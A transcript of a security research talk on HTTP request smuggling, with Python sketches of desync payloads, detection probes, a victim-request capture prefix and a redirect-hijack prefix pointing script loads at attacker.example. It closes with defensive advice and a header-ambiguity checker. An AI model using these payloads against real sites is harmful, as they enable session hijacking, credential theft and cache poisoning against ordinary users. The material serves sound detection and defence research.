HTTP is stateless: you send one request, and you get one response. But what if both of those assumptions were just kind of wrong? In this session, I'll share with you new tools and techniques to desynchronise complex systems, smash through the barriers around HTTP requests, and make websites rain exploits on their visitors.

During some research last year, I came up with a theory: if you're trying to select a topic to research, the best topic is the one that makes you the most nervous. So I asked myself, what topic am I personally really scared of? And the answer was HTTP request smuggling. I saw a presentation on this at DEF CON a few years ago called Hiding Wookiees in HTTP, and it was a thrilling presentation, but it also left me far too nervous to want to tackle this topic myself. One reason is that this technique was documented way back in 2005, and yet I'd never seen it successfully applied to a real website. Another is that my technical understanding just wasn't there, so some of the diagrams made absolutely zero sense to me, no matter how much I stared at them. And some of the statements on the slides were quite concerning. They said things like: you will not earn bounties using this technique. And even worse: you will certainly not be considered a white hat if you test any live website to see if it's vulnerable to this technique.

So at the time I just stayed away from this topic, but this year I thought I'd tackle it and see what happened. And quite a few things happened. I did manage to earn some bounties, and no one's called me a black hat for it so far, although yesterday on Twitter one guy did call me a terrorist. But I did get quite a few interesting reactions from the people that I reported these vulnerabilities to. Quite a few people were surprised. One guy was so surprised he appeared to think I was faking the entire thing, that I was doing some kind of digital sleight of hand to trick him into paying me a bounty. Another guy, at the opposite end of the spectrum, liked the unique technique that I used on his website so much that he decided to take it and use it himself on some other bug bounty targets to make some money behind my back. Obviously, I had no idea he was doing this; he didn't tell me. But then he ran into some technical issues with the technique and decided the best way to solve them was to pretend that he'd independently found it, email me, and ask for help, which didn't work out very well for him.

But out of all of this chaos, I've been able to bring you safe detection methods that let you find this vulnerability with zero risk of being called a black hat, all-new methods to trigger desynchronisation and exploit the results, and fresh methodology and tooling to bring clarity to a topic that's been ignored for far too long. So first I'm going to talk about what makes this attack possible, how to assess whether a target is vulnerable, and what to do next. Then I'll take a look at how to exploit it, using case studies all based on real websites.
Starting out with some really easy stuff and then building in complexity, and ending with a video of exploitation of a local system, in which I'll also show how to use the open source Burp Suite extension that I'm releasing as part of this research. After that I'll talk about how to prevent these attacks, and then wrap up and take questions if there's any time left.

If you picture a website as an end user, it probably looks something like this, because as an end user that's all we can directly see. But behind the scenes, most modern websites are routing requests through a chain of web servers speaking to each other using HTTP over a stream-based transport layer protocol like TCP or TLS. And for the sake of performance, these streams are heavily reused, following the HTTP/1.1 keep-alive mechanism. That means HTTP requests are placed back to back on these streams with no delimiters in between them, and each server in the chain is required to parse the HTTP headers of each request to work out where that request stops and the next one starts. So with this setup, we've got requests from users all around the world being funnelled over a small pool of TCP or TLS streams to the back-end server, which then has to parse these requests to split them back up into individual requests.

Having said all of that, it's pretty obvious what's going to go wrong here, right? What happens if an attacker sends an ambiguous message, one that gets parsed differently by the front-end and the back-end system? Here, the front end thinks this is one request, so it's forwarding the whole thing on to the back end. But the back end, for some reason, thinks this message ends with the final blue square, so it thinks the orange square is the start of the next request. And it's just going to wait for this phantom request to be completed, until the front end routes another request onto the back end over the same socket, and then we end up with these two requests being merged together.

So that's it. The essence of request smuggling is that you can plant a prefix on the back end that will be applied to the next request that hits the back end, whether that request is sent by us or by somebody else. Because we can't directly see what's happening behind the front end, we have to infer everything, and it's really easy to get tangled up and bogged down in the technical details; I certainly did myself when doing this research. But ultimately it's really that simple.

Now let's zoom in and see what the data looks like on the wire. This message is ambiguous because we're using an absolutely classic desynchronisation technique: we've just specified the Content-Length header twice. The front end is looking at the first Content-Length header, so it's forwarding everything on to the back end, including the orange G. The back end is looking at the second Content-Length header, so it reads in the blue data and thinks the G is the start of the next request. So when the next real request actually arrives, there's this G at the start of it, and whoever that user is, they're going to get a response saying something like "Unknown method GPOST". And that's it, we've successfully done a request smuggling attack. The only catch is that this technique is so classic it doesn't really work on anything that's actually worth hacking these days. What does work on plenty of interesting systems is using chunked encoding.
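To make that double Content-Length message concrete, here's a hedged sketch of roughly what it could look like on the wire, written as a raw-socket script. The hostname and path are placeholders, not a real target, and this is only the general shape; only ever send something like this at systems you're authorised to test.

```python
# Hedged sketch of the classic double Content-Length desync probe.
# "vulnerable.example" and the path are placeholders, not a real target.
import socket
import ssl

AMBIGUOUS = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 6\r\n"   # a front end honouring this forwards all 6 body bytes
    b"Content-Length: 5\r\n"   # a back end honouring this stops after "abcde"...
    b"\r\n"
    b"abcdeG"                  # ...leaving "G" as the start of the "next" request
)

ctx = ssl.create_default_context()
with ctx.wrap_socket(socket.create_connection(("vulnerable.example", 443)),
                     server_hostname="vulnerable.example") as s:
    s.sendall(AMBIGUOUS)
    print(s.recv(4096).decode("utf-8", errors="replace"))
```

If the two servers disagree in that way, the next request on the same back-end connection gets the stray G glued onto its method, which is exactly the GPOST symptom described above.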
Chunked encoding is an alternative way of specifying the length of a message whereby, instead of specifying the length up front using the Content-Length header, you send a Transfer-Encoding: chunked header, and that tells the server to parse the body of the message until it reaches a zero-length chunk followed by a blank line. So in this example, once again the front-end server has looked at the Content-Length and forwarded everything up to and including the orange G, and the back-end system has seen the chunked header, stopped parsing the first request after the zero, and once again it thinks the G is the start of the next request, and we get a GPOST response. This is basically exactly the same as what I showed you on the previous slide, except that this technique actually works on plenty of real systems.

Now, what if the desynchronisation happens the other way around? What if it's the front-end server that looks at the Transfer-Encoding header and the back end that looks at the Content-Length? Well, we can still exploit that; we just need to reformat the attack slightly, and we've got this minor limitation in that our malicious prefix that gets applied to the next request, shown in orange, has to more or less end with a zero followed by a newline. But in general that's not going to cause any problems. Now, if you're looking at the Content-Length on this slide, you might be wondering why it's three. That's because every line actually ends with \r\n; that's just not shown on the slides to keep them nice and clean.

So why does the chunked technique work on so many systems? Well, I think we've got to give some credit to the original specification, RFC 2616, because it says that if, as a server, you receive a message that has both Transfer-Encoding: chunked and a Content-Length, you should prioritise the chunked encoding. That kind of implicitly says these messages are acceptable and you shouldn't be outright rejecting them, and thereby all you need to exploit a website is for one of the servers in the chain to not support chunked encoding: it'll fall back to using the Content-Length and you can desynchronise them. When I found it, this technique worked on pretty much every single website using the content delivery network Akamai. They emailed me this morning to say that they've patched this, but I expect it still works on a decent number of systems out there.

So that's enough by itself to exploit quite a few systems, but what do you do if you want to exploit a target where every server in the chain does support chunked encoding? Well, that's often still possible. All you need is a way to hide the Transfer-Encoding: chunked header from one server in the chain. One way of doing that is with some whitespace. Some servers normalise whitespace after the header name, so they'll think this says Transfer-Encoding: chunked, whereas others will think the space is actually part of the header name, won't see the header, and will fall back to using the Content-Length, and you can desynchronise them. Other servers like to grep the Transfer-Encoding header for the word "chunked", so they'll think this request is chunked, whereas others tokenise the headers, so they won't think it's chunked, and you can desynchronise them. And there are loads of techniques that you can use to desynchronise systems like this.
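For reference, here's a hedged sketch of both orderings as raw bytes, following the shapes just described; the host and paths are placeholders. In the CL.TE case, the front end honours Content-Length and the back end honours Transfer-Encoding; TE.CL is the reverse, and note how its prefix ends with the zero chunk, as mentioned above.

```python
# CL.TE: front end uses Content-Length, back end uses Transfer-Encoding.
# Placeholders throughout; the byte counts are what matter.
CL_TE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 6\r\n"          # covers "0\r\n\r\nG" (6 bytes)
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"                          # back end: zero-length chunk ends the body here
    b"\r\n"
    b"G"                              # back end treats this as the next request's start
)

# TE.CL: front end uses Transfer-Encoding, back end uses Content-Length.
TE_CL = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 3\r\n"          # covers just "1\r\n" (3 bytes, hence "why three")
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"1\r\n"                          # front end: one-byte chunk...
    b"G\r\n"                          # ...containing "G"
    b"0\r\n"                          # front end: end of chunked body
    b"\r\n"
)
```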
This is just a tiny sampling of them, but every technique on this slide is one that I've successfully used myself to exploit a real system during this research. The ones highlighted in orange are techniques that I came up with myself, which I don't think are documented anywhere else.

So at this point we understand the fundamentals of how to desynchronise servers, so we've got a really powerful building block. But if we just try and whack a server with this building block, we're going to run into hazards and complications and waste time. To avoid that, I've developed a methodology to guide us in a step-by-step manner towards a successful exploit.

First off, we need to detect when desynchronisation is possible. The obvious way of doing this is to send a pair of requests, where the first one is ambiguous and designed to poison the back end with a prefix, and the second one is designed to trigger the poisoned response. But that technique is massively unreliable, because if anyone else's request hits the back end in between our two requests, they'll get the poisoned response, they'll potentially have a bad day, and we won't find the vulnerability. So we need a better way of doing it, and after a lot of effort I think I've got one.

How this request gets handled depends on how the servers process these headers. If both systems look at the Content-Length, we get the response pretty much immediately and everything's fine. If the front-end server thinks this message is chunked, it will read in the first chunk size of three, read in the ABC, and then read in the next chunk size, which is Q. That's not a valid chunk size, because chunk sizes are hexadecimal, so it will reject the request outright and it will never even hit the back-end system. But if the front end looks at the Content-Length header and forwards all the blue data, but not the orange Q, onto the back end, and the back end thinks this message is chunked, then the back end will basically just time out while waiting for the next chunk size to arrive. So if we send that request and we get a timeout, that's a strong indication that the server is vulnerable to request smuggling using that technique.

We can detect when the desynchronisation happens the other way round using a fairly similar payload. The only significant difference is that if the server is vulnerable the first way round, then we end up accidentally poisoning the back-end socket with the orange X, which is not an ideal outcome. So you should make sure you always try the technique on the left first. This technique should be tried on every single endpoint on the target website, because requests to different endpoints may be routed to different back-end servers, and you should try it with every desynchronisation technique that you know. This strategy is now used by Burp Suite's scanner, and also by the free open source tool that I'm releasing as part of this research to find this vulnerability. Because this technique is based on inference, it will get some false positives, but it doesn't get very many, and its real strength is that you'll get vastly fewer false negatives, and there's no risk to real users.
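Here's a loose sketch of that timeout-based CL.TE probe as a raw-socket script; the target name, path, and timeout threshold are all made up for illustration. The key idea is just that a stall, rather than a prompt response or an outright rejection, is the vulnerable signature.

```python
# Hedged sketch of the timeout-based detection probe. If both servers use
# Content-Length the response is immediate; if the front end parses chunked
# it rejects the invalid "Q" chunk size; if the front end uses Content-Length
# and the back end parses chunked, the back end stalls waiting for the next
# chunk size, and we observe a timeout.
import socket
import ssl
import time

PROBE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"   # placeholder target
    b"Content-Length: 6\r\n"          # covers "3\r\nabc" only
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"3\r\n"
    b"abc"
    b"Q"                              # invalid chunk size, never forwarded by a CL front end
)

ctx = ssl.create_default_context()
start = time.monotonic()
with ctx.wrap_socket(socket.create_connection(("vulnerable.example", 443)),
                     server_hostname="vulnerable.example") as s:
    s.settimeout(10)                  # arbitrary illustrative threshold
    s.sendall(PROBE)
    try:
        s.recv(4096)
        print("responded after %.1fs - probably not CL.TE" % (time.monotonic() - start))
    except socket.timeout:
        print("timed out - possible CL.TE desync")
```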
For example, on one target I found, this technique detected the vulnerability every single time, whereas using the classic approach of sending a pair of requests, I had to make 800 attempts before one was successful, and that's potentially 800 real users that got a broken response.

Now, in an ideal world you could stop there, but most people will probably want you to prove that the vulnerability really, definitely exists. To do that, we're going to use the technique where you send a pair of requests. It's kind of unreliable, but we don't have much choice. Here, the first request is going to smuggle the prefix shown in orange, and then we're going to send a second, separate request, shown in green, and based on the response we get to that request, we can tell whether the server is vulnerable. It's crucial that these two requests are not sent over the same connection to the front-end server, because if you do that, you'll just get false positives. The endpoint that you send these requests to is really important too, because often if the back end doesn't like the request it receives, it will reject it with a 400 or 500 response and close the connection to the front-end server, which means the orange poison will be thrown away and the attack will fail. So you want to select an endpoint that expects to receive a POST request, and also try to preserve any parameters that it needs; in these examples, I've preserved the q=smuggling parameter. The other thing to remember is that even if you do all of that, this technique is non-deterministic. If anyone else's request lands in between your two requests, it will fail, and even if the target has no other users browsing it, many websites use a pool of connections to the back end, so it may still require multiple attempts. But as soon as one works, you know the target is vulnerable.
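A rough sketch of that confirmation flow, under the same placeholder assumptions as before: the attack request and the victim request deliberately travel over two separate front-end connections, and the whole thing is retried because it's inherently racy.

```python
# Hedged sketch of confirming a CL.TE desync with a request pair sent over
# two separate connections. Everything target-specific here is a placeholder.
import socket
import ssl

HOST = "vulnerable.example"

ATTACK = (
    b"POST /search?q=smuggling HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 42\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /404-prefix HTTP/1.1\r\n"   # smuggled prefix: should yield a 404
    b"X-Ignore: X"                    # swallows the start of the victim request
)

VICTIM = (
    b"GET / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"\r\n"
)

def send(raw):
    ctx = ssl.create_default_context()
    with ctx.wrap_socket(socket.create_connection((HOST, 443)),
                         server_hostname=HOST) as s:
        s.sendall(raw)
        return s.recv(4096)

for attempt in range(10):                 # racy, so retry a few times
    send(ATTACK)
    status = send(VICTIM).split(b" ")[1]  # fresh connection for the victim
    if status == b"404":
        print("poisoned the socket on attempt", attempt + 1)
        break
```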
Right, now we're done with the theory, we can finally take a look at what damage we can do using this technique. Every case study here is a real system that I exploited during this research. I have unfortunately been forced to redact rather a large number of company names, but I'd like to give a shout-out to every company that actually let me name them; please remember, these are the guys that are now actually secure. Also, during this section I'm going to keep a running total of the bounties earned via this research. As usual, we've spent 50% of these bounties on beer and donated the other 50% to local charities.

Probably the easiest attack you can do with request smuggling is bypassing security rules that have been implemented on the front-end system. On one well-known software vendor, I found that their front end was blocking access to /admin. So by using request smuggling, their front end would first think I was accessing the root of the website, and then when I sent the follow-up request, shown in green, it would once again think I was accessing the root of the website, but the back end would think I was trying to hit the admin page, and serve it up. So far, so simple.

Now, lots of front ends like to rewrite requests by adding headers to them, and one header practically every system uses some variation of is X-Forwarded-For, which specifies the remote user's IP. If you specify this header yourself directly in a normal request, any well-configured front end will rewrite that header or remove it entirely, so it won't work. But when you smuggle a request, you effectively bypass all the rewrite rules used on the front end, and thereby you can spoof your IP and make it look like your request is coming from anywhere. Using this technique, I exploited a particular security vendor and got an incredible $300 bounty. So I'm not suggesting that you're going to get rich quick using this particular technique, but it's worth knowing, because it does work on practically every target, and there's also a slightly less obvious use for it.

Imagine you've found a website where the timeout-based detection technique works, so you're fairly sure it's vulnerable, but their traffic volume is so high that you've effectively got zero chance of ever getting a poisoned response yourself. What you've effectively got there is a blind request smuggling vulnerability. How can you prove that system is really vulnerable? Well, one thing you can try is sending a request that looks something like this, but with a unique hostname in the X-Forwarded-For header. If you get a DNS lookup for that hostname, that proves the orange data has been interpreted as a second request by the back-end system, and thereby proves it is vulnerable to request smuggling.

Now, IP spoofing is OK, but the really interesting behaviour is going to come from custom application-specific headers, and to exploit those we need to know what they are. On New Relic, I was able to submit a login request where I'd shuffled the parameters so that the email address parameter was last. So when I sent my follow-up request, it effectively got concatenated into the email address I was trying to log in with, and the response I got from the server contained the entirety of my second request, including all the headers the front end had stuck onto it, and some of those are going to come in really useful on the next slide.

So on New Relic, it became evident that the back-end system wasn't the actual most-back-end back end; it was a reverse proxy, so by changing the Host header, I could access different internal systems. I basically had SSRF via request smuggling. However, pretty much all of these systems responded with a redirect to HTTPS, because they thought my request wasn't being sent over HTTPS. But by taking the X-Forwarded-Proto header discovered on the previous slide and sticking that on there, I could tell them "yeah, I'm using HTTPS, you can trust me", and actually gain access to those systems.
So I went exploring, and I found a page that gave me an incredibly taunting error message: it said "not authorised with header", and then it had a colon, but it didn't tell me what the name of the header I wasn't authorised with actually was. So I went through the headers whose names I'd already discovered, and I tried the X-NR-External-Service header, and that actually just made the problem worse. At this point I could have tried the request reflection technique on loads of different endpoints on different New Relic systems until I discovered this header, but I was feeling kind of lazy, so I decided to cheat and consult my notes from the last time I compromised New Relic. That revealed the Service-Gateway-Account-Id and Service-Gateway-Is-NewRelic-Admin headers, and using those I was able to gain full access to their core internal API, impersonate any user on the entire system as an admin, and gain pretty much full control over everything. I got a reasonable bounty for that, and they patched it pretty quickly with a hotfix, but they said that the root cause was their F5 load balancer, and I don't think that's been patched yet, so that's more or less a zero-day.

Now, what we've seen here is that with request smuggling, if you're willing to put the time in, you can often break directly into internal systems and have a good time. But there are also much easier and more reliable techniques focused on attacking other users, so that's what we're going to take a look at next.

Firstly, if the application has any way of persistently storing text data, then exploitation is really easy. On Trello, which is a popular productivity application, I smuggled a request to update my profile, and I made sure that the bio parameter was last, and then I didn't send a follow-up myself, so some random other Trello user's request got concatenated onto the end. Then I could just browse to my bio and retrieve their entire request, including all their session cookies, even though they were both Secure and HttpOnly. So using this technique, with zero user interaction, every time you send this you get control over a random person who is currently browsing the website. On a different target there wasn't any obvious way of persistently storing data, but I was able to file a support ticket and get the user's request concatenated into that ticket, so that eventually I would get an email containing their request and could once again hijack their account.

Now, what if you can't store data? Well, there's a whole other branch of attack based on causing harmful responses to get served directly to people browsing the site. The simplest one conceptually is one I found on a well-known SaaS vendor; they haven't patched it, which is why I can't name them. They had some reflected XSS, and by itself that's OK, but it's not that great, because it requires user interaction to exploit people, so it's not ideal for mass exploitation. But by smuggling the request that triggered the XSS, I could get the harmful response served to random other people browsing the website. So we've taken this issue and we can just exploit random people with no user interaction. We can also grab HttpOnly cookies once again using this technique, and it can also be used with traditionally unexploitable XSS, like XSS in the User-Agent header, or XSS where there's a CSRF token on the request.
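To show the shape of that stored-capture attack, here's a hedged sketch of the kind of smuggled prefix involved. The /profile endpoint, parameter names, cookie, and byte counts are hypothetical stand-ins, not Trello's real API; the point is only that the final parameter has an over-sized declared length and no value yet, so the victim's request becomes its value.

```python
# Hedged sketch: a CL.TE attack whose smuggled prefix is a profile update.
# The victim's whole request gets swallowed into the trailing "bio" parameter
# and stored where the attacker can read it back. All names are made up.
CAPTURE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 172\r\n"               # covers the 172 bytes of body below
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    # --- smuggled prefix starts here ---
    b"POST /profile HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Cookie: session=ATTACKER_SESSION\r\n"  # stores into the attacker's profile
    b"Content-Length: 800\r\n"               # deliberately larger than the real data
    b"\r\n"
    b"name=x&bio="                           # victim's request becomes the bio value
)
```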
Now, while testing one target, I happened to load their home page in a web browser with the developer tools open, and this error message popped up. Normally, so what? But I kind of recognised the IP address in this error message, which made me a little bit worried, and what was more worrying is that I got that error message regardless of what device I loaded the home page on and what network I connected from. And it turned out, yep, this was my fault. I'd sent a request trying to trigger a redirect from their system, and someone else's request, an attempt to fetch an image, had been concatenated onto it. So they got this redirect response, which is, you know, not ideal, but it's only one user, right, who cares about them? Except a cache had seen this happen. It had seen them try to fetch this image from the home page, it had seen this redirect to my server come back, and it had saved it. So for the following 48 hours, everyone that went to the target's home page ended up trying to fetch that image from my website.

Now, on the one hand, this is a brilliant demonstration of how easy it is to do cache poisoning with request smuggling, it's so easy I did it by accident. But on the other hand, this is not something you really want to happen unintentionally, so there are some things you can do to reduce the chances of it. One is to try and specify a prefix that triggers a response with anti-caching headers. Another is to send your victim follow-up requests as fast as possible. And another is, if you've got a choice of front ends, to target one in a geographic region that's asleep at the time, and then you'll be racing against less genuine user traffic.

Now, that wasn't ideal, but naturally it left me wondering: what happens if we embrace this possibility? So here I've smuggled a request saying "I'd like to fetch my API key, please", and if someone else's request gets concatenated onto that, it gets completed with their cookies and their session, and it fetches their API key. Them fetching their own API key is harmless, but if a cache sees that happening and saves it, then we can just browse to whatever static resource that user was trying to fetch and retrieve their key. If this attack sounds kind of familiar, yep, that's because it's basically just a variation of web cache deception. The key difference is that this technique, once again, doesn't require any interaction on the part of the user; you're just exploiting a random person browsing the website every time you do it. There's also a minor catch with this technique, which is that as an attacker you've got no control over where the user's API key lands on the website. It's just going to appear on a random static resource on that site, so you're going to have to reload all the static resources to try and find the key. Now, because the pipeline I used to get examples for this presentation doesn't bother logging in to websites, I don't have a real example of a vulnerable target, but I'm pretty sure this vulnerability does exist out there, and in general you're going to find it in places that have those properties.

Now, on New Relic the back end was an internal proxy, and on some other systems the back end was actually a CDN, which doesn't make much sense to me. I found one server that chained Akamai onto Cloudflare. Why?
But on a different system, they chained Akamai onto Akamai, and the two Akamais were configured differently, so I could desynchronise them. Thereby, by changing the Host header, I could serve up content from any website on the Akamai platform on these guys' website, and the front-end Akamai would then cache that, so I could override their home page with any content from any site on the Akamai platform. This technique also works pretty well on SaaS providers, where you can simply change the hostname to a different client of the SaaS provider.

Now, Red Hat's website was itself directly vulnerable to desynchronisation, and while looking for a vulnerability to chain with request smuggling on there, I found this DOM-based open redirect. That raised an interesting challenge, because with request smuggling we control the URL that the back-end server thinks the user is on, but we don't control the URL in the victim's browser. So when this getQueryParam function is executed, it's executed in the victim's browser, so we can't directly exploit this vulnerability. But by finding a local redirect on the target, I could effectively chain that with the DOM-based redirect, gain control of the URL in the user's browser, and exploit this issue. And that's a generic technique that will let you combine any DOM-based issue that looks at the URL with request smuggling, to exploit people without user interaction.

Now, quite a few local redirects actually turn into open redirects in the presence of request smuggling, because we can change the Host header. In particular, there's a default behaviour in Apache and most versions of IIS whereby if you try to access a folder and you don't specify the trailing slash, they give you a redirect that puts the slash on, and they populate the hostname in that redirect using the Host header. This technique works on loads of systems, and you can use it to redirect JavaScript loads on the target website, thereby gaining full control over whatever page the JavaScript load comes from, and use that for cache poisoning and gain full control over the website more or less permanently. This became my default technique for exploiting this vulnerability, and I got quite a few different bounties using it.
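Here's a hedged sketch of that redirect-hijack prefix; the folder name and attacker domain are placeholders. The smuggled request asks for a folder without its trailing slash, with the attacker's domain in the Host header, so the victim's next request (say, a JavaScript import) receives a redirect pointing at the attacker's server.

```python
# Hedged sketch: smuggled prefix abusing the trailing-slash redirect.
# A victim request that lands behind it gets a response like:
#   301 Moved Permanently
#   Location: http://attacker.example/static/
# which, if cached against a JavaScript URL, hijacks every page importing it.
REDIRECT_PREFIX = (
    b"GET /static HTTP/1.1\r\n"       # folder requested without trailing slash
    b"Host: attacker.example\r\n"     # reflected into the Location header
    b"X-Ignore: X"                    # absorbs the start of the victim's request
)
```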
A couple of extra points are worth mentioning. If you get a 307 open redirect, that is absolute gold dust, because imagine a web browser is doing a POST request to log someone in: if it receives a 307 redirect, it will re-POST those credentials to the new website. So you can just make people send you their username and password in plain text with no user interaction. Also worth mentioning is that some thick clients, like non-browser HTTP libraries, have that data-reposting behaviour on all redirects, rather than just 307s. So, for example, on New Relic I was able to steal the API tokens off one of their clients even though they were only using a 301 redirect.

Now, one of the targets that this redirect cache-poisoning JavaScript-hijacking strategy worked on was PayPal. If you tried to access /webstatic, they gave you a redirect using the Host header to populate it. There were a couple of problems, though. One is that the two Host headers were getting concatenated, and we only controlled the first one, so this was breaking the redirect; that was easily fixed by sticking a question mark at the end of the Host header. The other issue was the protocol on this redirect. It's HTTP, and because of browsers' mixed-content protections, that meant this was only going to be exploitable in Safari and Edge. For the details of how you can exploit those, you'll need to check out my cache poisoning presentation from last year, because I don't have time to cover it right now. The important thing is that this JavaScript file, which I could persistently turn into a redirect to my own malicious JavaScript file, was used on PayPal's login page.

Unfortunately, their login page used CSP, which blocked the redirect. But their login page also loaded a different page in an iframe, and this sub-page didn't use CSP and also imported my poisoned JavaScript file, so I could hijack the iframe. But thanks to the same-origin policy, I couldn't read the user's password off the parent page, because I was stuck on c.paypal.com. Then my colleague Gareth Heyes found an endpoint, paypal.com/us/gifts, and this is a static page: it doesn't have CSP, or it didn't at the time, and it once again imports my malicious JavaScript file. So by first compromising the iframe, because it loads c.paypal.com, then redirecting the iframe to paypal.com/us/gifts, and then re-compromising it using my JavaScript file, I could then read the user's PayPal password off the parent page and send it off to my website. So the end impact is that if you went to PayPal's website in one of those browsers, I just more or less got your password, and they paid a healthy $19,000 bounty for that.

Now, PayPal fixed this issue by reconfiguring the front end, which was Akamai, to block any request that had the word "chunked" in the Transfer-Encoding header, and they asked me, "albinowax, do you think this is a solid fix?", and I kind of poked at it for a little bit and said, yep, looks solid to me. And then a few weeks later, I decided to try out a new desynchronisation technique where I simply used a line-wrapped header. This strategy is pretty much RFC-compliant, so I didn't really think it was going to work on anything, and it didn't directly work on any systems. But it turns out there was a little bug in Akamai whereby if you use line-wrapping, they don't see any of the data after the line-wrap. That meant they didn't see this header, they let it through, I could once again desynchronise PayPal's login page and take control of it, and I got another $20,000 bounty. I thought that was really generous of PayPal, especially given that it was basically my fault in the first place.

So, now we've seen a whole range of different attack techniques that you can do with request smuggling, it's time for the demo. This is Bugzilla, an exact replica of the target system, which holds lots of juicy Firefox zero-days at any given time. I'm going to take the request to the home page, right-click on it, and click "Launch Smuggle Probe", which is an option there because I've installed this free open source Burp extension, and I've disabled all the desynchronisation techniques except for the one that's actually going to work. Now we're going to look at Flow, which is a separate extension that just shows you the requests, and you can see that here I'm using the timeout technique to detect the vulnerability, and it seems to be working. Now, if you look at the headers, it's probably too small to see, but you can see the previous header, the one before Transfer-Encoding, ends with 0A (a bare line feed), when all the other headers end with 0D 0A (a carriage return plus line feed). That's what's causing the desynchronisation here; the sketch below shows the same trick as raw bytes.
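A hedged reconstruction with a placeholder host and prefix; the real demo request differed, but the mechanism is the bare 0A line ending.

```python
# Hedged sketch of the bare-LF obfuscation seen in the demo. The previous
# header ends with a lone \n (0A) instead of \r\n (0D 0A). A front end that
# only splits headers on \r\n sees one long "Foo" header and no
# Transfer-Encoding, so it uses Content-Length; a back end that also splits
# on \n sees two headers and parses the body as chunked.
BARE_LF = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"   # placeholder target
    b"Content-Length: 6\r\n"          # covers "0\r\n\r\nG"
    b"Foo: bar\n"                     # ends with 0A only
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"G"                              # left behind as the next request's start
)
```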
So the front end thinks that Foo plus the Transfer-Encoding line is one header, whereas the back end, which is nginx, sees them as two different headers, and thereby we can desynchronise them. You can see it's found the vulnerability here, so I'm going to right-click on the request and click "Smuggle Attack". This pops open a Turbo Intruder window. You don't need to change anything here apart from the prefix variable, which is just the malicious prefix that gets applied to the next request. When I launch the attack, it sends the attack request and then loads of victim requests, which are all identical, and you can see the first one, even though it's identical to the second, gets a 404 status code back, and that's because of the prefix we've specified here to try and make it trigger a 404. So that pretty much proves this system is vulnerable. I'm just going to replay that to show it's completely consistent, and you can show that if you change the prefix, the behaviour you get on the second request changes too. So we know this system is vulnerable to request smuggling; we just need to exploit it.

On Bugzilla, anyone can register an account, file a bug, and put an attachment on the bug that contains HTML. But this gets rendered on a different domain (see, we're on bmo-sandbox.vm), so by itself you can't do any damage with this feature. This is not a vulnerability on its own, thanks to the same-origin policy. But we're going to see if we can chain that behaviour with request smuggling to actually achieve something useful. So here I'm going to take the request that fetches the attachment, which is sent to bmo-sandbox.vm but is actually on the same IP as bmo-web.vm on real Bugzilla systems, and I'm going to stick that in the malicious prefix. I'm just going to leave this X-Ignore header on the end, because the victim's request gets concatenated directly onto it. Here you can see the victim request has been sent to bmo-web.vm, but it's retrieved this malicious HTML. So all that remains now is to prove this vulnerability really works inside a browser. I'm going to comment out the victim requests, send this, and basically leave the back end poisoned with this malicious half-a-request. And now, any user, no matter what they click, is going to get that response back, and it's going to steal their password. Great. That got a $4,500 bounty, taking the total amount earned during this research to $70k. That's the total so far, but there should hopefully be some more bounties on the way.

Now, as far as preventing these attacks goes, they're best prevented on the front-end system, because the back end can't normalise requests; it just has to reject them outright. But firstly, you can't fix this unless you can find it properly. So make sure that whatever tool you're using supports sending invalid Content-Length headers and doesn't automatically normalise requests. In particular, that means that if you're trying to replicate this vulnerability using curl, depending on which desynchronisation technique you're using, it may not work. Also, some companies like to make pentesters work through a proxy. If you do that, you'll fail to find genuine vulnerabilities that exist, and you'll also find phantom vulnerabilities that only let you exploit other pentesters, so it's not a very good idea. As far as patching this goes, the ideal is to make the front end exclusively use HTTP/2 to talk to the back end. But if that's not plausible, then the front end needs to normalise any ambiguous requests before routing them downstream, along the lines of the sketch below.
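As a rough illustration of what "normalise or reject ambiguity" can mean in practice, here's a minimal sketch of the checks a front end might apply before forwarding a request. This is not a complete or production-grade parser, just the spirit of the advice.

```python
# Minimal sketch (not production code) of ambiguity checks a front end
# could apply before forwarding a request downstream.
def is_ambiguous(raw_head: bytes) -> bool:
    """Return True if this HTTP/1.1 header block should be rejected."""
    lines = raw_head.split(b"\r\n")
    cl, te = [], []
    for line in lines[1:]:                   # lines[0] is the request line
        if not line:
            break                            # blank line ends the headers
        if line[:1] in (b" ", b"\t") or b"\n" in line:
            return True                      # folded or bare-LF header lines
        name, sep, value = line.partition(b":")
        if not sep or name != name.strip():
            return True                      # e.g. space before the colon
        key = name.lower()
        if key == b"content-length":
            cl.append(value.strip())
        elif key == b"transfer-encoding":
            te.append(value.strip().lower())
    if len(cl) > 1 or (cl and te):
        return True                          # duplicate CL, or CL plus TE
    if any(v != b"chunked" for v in te):
        return True                          # obfuscated or unknown TE value
    return False
```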
That strategy is backed up by RFC 7230, so that's probably what you want to do. If you're stuck on the back end, yeah, you just have to reject the request outright and drop the connection. It's not ideal, which is why this is better off being patched on the front end.

There are loads of resources online for this. There's the white paper; check that out. We've also, for the first time, released a whole bunch of free online labs, so you can practise exploiting this vulnerability on replicas of real systems and get familiar with it without the carnage you get when you try to exploit it on a real site. The source code for the tool is online too; it works in the free version of Burp as well as the pro version. All of these resources are well worth checking out.

The three key things to take away are: HTTP request smuggling is a real vulnerability, and it doesn't matter if it's scary, you can still get hacked with it; HTTP/1.1 parsing is a security-critical function, and it should always be audited in web servers before you even think about using them; and detection of request smuggling doesn't have to be dangerous.

